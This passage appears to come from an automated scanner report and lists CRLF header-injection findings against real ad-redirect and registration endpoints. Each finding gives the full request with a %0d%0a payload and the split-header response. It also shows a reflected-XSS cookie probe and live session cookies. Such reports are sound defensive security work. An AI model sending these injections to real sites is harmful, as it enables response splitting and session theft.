Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:41 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk153110218044741583ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=87307
1ff0f4663d8
&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=153110218044741583&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1137

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.18. http://j.jioet.com/cgi/r [typage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the typage request parameter is copied into the Location response header. The payload 30b9d%0d%0ad888947672d was submitted in the typage parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=30b9d%0d%0ad888947672d&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:11 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qiwqABU0AAFs3VGE; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:11 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:11 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk104110218044811833ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=30b9d
d888947672d
&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=104110218044811833&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1097

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.19. http://j.jioet.com/cgi/r [vkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the vkey request parameter is copied into the Location response header. The payload 23e2a%0d%0a3f19f058323 was submitted in the vkey parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=23e2a%0d%0a3f19f058323&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:05 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qhQqABU0AAEaLWAM; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:05 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:05 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk426110218044805062ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:05 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=23e2a
3f19f058323
&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=426110218044805062&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.20. http://member.internet.com/register [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.internet.com
Path:   /register

Issue detail

The value of REST URL parameter 1 (the first path segment of the request URL) is copied into the Location response header. The payload 2ba49%0d%0af6db1a0359b was submitted as that path segment. Here the reflected value is the relative redirect target itself, so the split happens in the path: the decoded CR LF ends the header after /2ba49 and f6db1a0359b begins a new header line. Unlike the advertising redirectors above, this endpoint reflects whatever path is requested, so no existing parameter needs to be present for the injection to work. The empty line shown after the injected fragment is the same rendering artifact that follows the marker in every finding in this report, not a CR LF CR LF sequence; only one CR LF pair was submitted.

Request

GET /2ba49%0d%0af6db1a0359b?gt HTTP/1.1
Host: member.internet.com
Proxy-Connection: keep-alive
Referer: http://isp.thelist.com/?4d0ed--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7894299f6b8=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; __utmz=175186238.1298033268.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026213892:ss=1298026071106; __utma=175186238.1586971603.1298033268.1298033268.1298033268.1; __utmc=175186238; __utmb=175186238.6.10.1298033268; _bizo_cksm_crc32=945E88E8; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=221%3D98%2C315%3D1352%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:52:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /2ba49
f6db1a0359b

Content-Type: text/html
Content-Length: 0


2.21. http://o1.qnsr.com//cgi/c [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   //cgi/c

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 1dcd0%0d%0a41e1a72565e was submitted in the a parameter. This caused a response containing an injected HTTP header. The scanner attributes the issue to a, the first semicolon-delimited key in the query; in the request below the payload is in fact appended to the end of the k= target URL, and the Location header reflects it, split at the decoded CR LF, at the end of the redirect path.

Request

GET //cgi/c?a=20127048;x=3584;c=203695854,203695854;i=0;n=203;s=9544;p=20830501;;;y=http://www.thelist.com/;;e=i;s=9544;g=254;w=0;m=0;z=1412312582;k=http://solutions.internet.com/5146_cloud-ssoban1dcd0%0d%0a41e1a72565e HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:22 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Location: http://solutions.internet.com/5146_cloud-ssoban1dcd0
41e1a72565e
?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=734110218044722769
Content-Type: text/html; charset=iso-8859-1
Content-Length: 431

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://solutions.internet.com/5146_cloud-ssoban1dc
...[SNIP]...

2.22. http://o1.qnsr.com//cgi/c [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   //cgi/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 523ba%0d%0a01f8f6d3fe5 was submitted as the name of a parameter that the application does not define. This caused a response containing an injected HTTP header. The injection point is therefore a parameter name rather than a value: the redirector appends every key/value pair it receives to the k= target URL, so any key containing a decoded CR LF splits the Location header just as a value does. Validating only the values of known parameters would not close this issue; the check has to sit where the header is written.

Request

GET //cgi/c?a=20127048;x=3584;c=203695854,203695854;i=0;n=203;s=9544;p=20830501;;;y=http://www.thelist.com/;;e=i;s=9544;g=254;w=0;m=0;z=1412312582;k=http://solutions.internet.com/5146_cloud-ssoban&523ba%0d%0a01f8f6d3fe5=1 HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:32 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Location: http://solutions.internet.com/5146_cloud-ssoban&523ba
01f8f6d3fe5
=1?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=723110218044732893
Content-Type: text/html; charset=iso-8859-1
Content-Length: 438

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://solutions.internet.com/5146_cloud-ssoban&am
...[SNIP]...

2.23. http://o1.qnsr.com/cgi/r [&exp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the &exp request parameter is copied into the Location response header. The payload ddacd%0d%0a54f1c4d6f1f was submitted in the &exp parameter. This caused a response containing an injected HTTP header. The parameter is named &exp because the original query string carries a doubled ampersand (&&exp=y) and the scanner kept the extra & as part of the name; the server reflects it unchanged, as the &&exp=ddacd fragment in the Location header below shows.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=ddacd%0d%0a54f1c4d6f1f HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:02 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk452110218044802446ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:02 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==; path=/; EXPIRES=Sun, 20-Mar-11 12:48:02 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=452110218044802446&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=ddacd
54f1c4d6f1f
&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 593

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.24. http://o1.qnsr.com/cgi/r [;n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the ;n request parameter is copied into the Location response header. The payload 67f65%0d%0a03a2929b961 was submitted in the ;n parameter. This caused a response containing an injected HTTP header. The name ;n is the scanner's label for the semicolon-delimited segment at the start of the query; in the request below the payload was inserted as a bare token after z=TIMESTAMP; and the Location header reflects it, split at the decoded CR LF, immediately after the server-generated CLK value.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;67f65%0d%0a03a2929b961&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:24 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk466110218044724846ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:24 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=NjdmNjUNCjAzYTI5MjliOTYxJkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:24 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=466110218044724846&67f65
03a2929b961
&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 594

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.25. http://o1.qnsr.com/cgi/r [CCID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the CCID request parameter is copied into the Location response header. The payload bc1f7%0d%0a3520e81e85c was submitted in the CCID parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=bc1f7%0d%0a3520e81e85c&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:35 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk486110218044735480ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:35 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9YmMxZjcNCjM1MjBlODFlODVjJlFUUj1aWmYwWmEyMDEyMzUxOVpiMFpnMTcyWnc1NlptMFpjMjAzNjMwOTEwLDIwMzYzMDkxMFpzOTU0NFpaJkNMSz0zOTQxMTAyMQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:35 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=486110218044735480&&CCID=bc1f7
3520e81e85c
&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 577

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.26. http://o1.qnsr.com/cgi/r [CLK parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the CLK request parameter is copied into the Location response header. The payload fd955%0d%0a5e75bad9d9d was submitted in the CLK parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=fd955%0d%0a5e75bad9d9d&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:43 GMT
Server: QUAD 3G
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk716110218044743211ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:43 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPWZkOTU1DQo1ZQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:43 GMT; DOMAIN=.qnsr.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=716110218044743211&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=fd955
5e75bad9d9d
&&exp=y&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 576

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.vendorseek.com/website_design_services.
...[SNIP]...

2.27. http://o1.qnsr.com/cgi/r [QTR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/r

Issue detail

The value of the QTR request parameter is copied into the Location response header. The payload 8087b%0d%0aba64b5bd6e9 was submitted in the QTR parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=8087b%0d%0aba64b5bd6e9&CLK=394110218044719808&&exp=y HTTP/1.1
Host: o1.qnsr.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
